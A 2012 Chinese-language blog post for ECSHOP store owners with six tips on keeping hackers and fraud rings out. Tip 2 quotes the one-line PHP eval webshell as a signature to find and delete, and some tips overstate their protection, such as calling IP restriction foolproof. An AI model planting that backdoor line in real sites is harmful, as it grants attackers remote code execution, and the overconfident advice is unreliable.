目前位置: 首頁 > HTML5、CSS3、其他 > 如何防止駭客(詐騙集團)入侵網站

如何防止駭客(詐騙集團)入侵網站 超大 稍大 微大

ECSHOP 繁體中文版-響應式模板-虛擬主機::ECSHOP2.7.3繁體中文全支援-原來如此 發表於: 2012-12-05
1、絕不主動以電話聯繫消費者:
詐騙手法不斷翻新,讓人防不勝防,身為賣家的你,有責任做好把關,確保消費者個資不外洩,才能減少受騙機率,詐騙集團通常會在假期前一天入侵資料庫,以便取得最新交易資料,然後於假日第一天開始詐騙,他們的共通點就是使用電話,因此賣家應該反其道而行,並在網站上有明顯標示,除非消費者主動聯繫你...

2,對網站程式進行總體檢
被入侵的網站通常會有多處遭到修改,他們會在檔案中植入很流行的【一句話】木馬程式,然後就可以遠端操控資料庫,因此最好花點時間掃瞄所有的程式和模版檔案,如果程式或模版檔案中包含 <?php @eval($_POST['XXXXX']);?> 應該立即刪除,其中的XXXXX可能是任何文字,總之,這段程式碼肯定有問題...

3、增強後台安全
修改admin資料夾名稱不是安全的作法、駭客照樣有辦法得知,偏偏EC後台有完整的資料庫和檔案操作選項,因此駭客登入後台後就可以為所欲為,例如修改LBI庫文件,下在資料庫備份檔,嚴重一點的網店的匯款資料遭到竄改,總之任何事情都可能發生,因此應該將資料庫和檔案操作選項拿掉以策安全,雖然會造成些許不便,但總比被入侵好...

4、使用複雜的密碼
很多人為了容易記就隨便用一組密碼,如身分證、生日或電話號碼,連續的數字或字母,這些都很容易被破解,可要知道,多數入侵者功力不是很好,他們拿到密碼還要花錢請人解碼,越複雜的密碼破解時間越久,費用也就越高,因此容易放棄,不管 cpanel 或是 ecshop 後台,密碼越複雜越好,大寫字母+小寫字母+數字+萬用字元,混和使用,長度也不要低於8個字...

5、用IP管制萬無一失
固定IP 如同身分證字號,不會有重複,更不可能被盜用,用它來做把關,即使你把帳號密碼都給駭客,他也無法進入 ecshop 後台,以目前來說,應該算是最安全的作法,而且各種類型網站都可以用,比較麻煩的是浮動IP的部分,因為每次連線IP都不同,所以方法也比較麻煩...

6、隱藏 config.php 資料庫連線密碼
ecshop 2.7.3 截至目前還算安全,但是開放原始碼的程式誰也不感保證沒漏洞,通常等到有任被入侵才知道,因此事先防範非常重要, config.php 儲存著資料庫連線訊息,駭客可以透過工具的協助打開這個檔案,進而取得資料庫最高權限,會使用這種方法的人,多數是無法順利登入後台,對PHP也有一定的認識,因為比較費力,相對的,小網站對她不具吸引力...

隨著資訊快速變化,在網路中看似方便且實用的功能,通常會因為過度的修改而破壞原有的結構及安全性,就像大自然一樣,過度的開發其實背後佈滿危機,凡事適可而止,別讓方便帶來麻煩...

只有本站虛擬主機會員才能對文章發表問題
如果你是本站虛擬主機會員請先至會員中心首頁綁定主機帳號
其他會員請至留言板提問!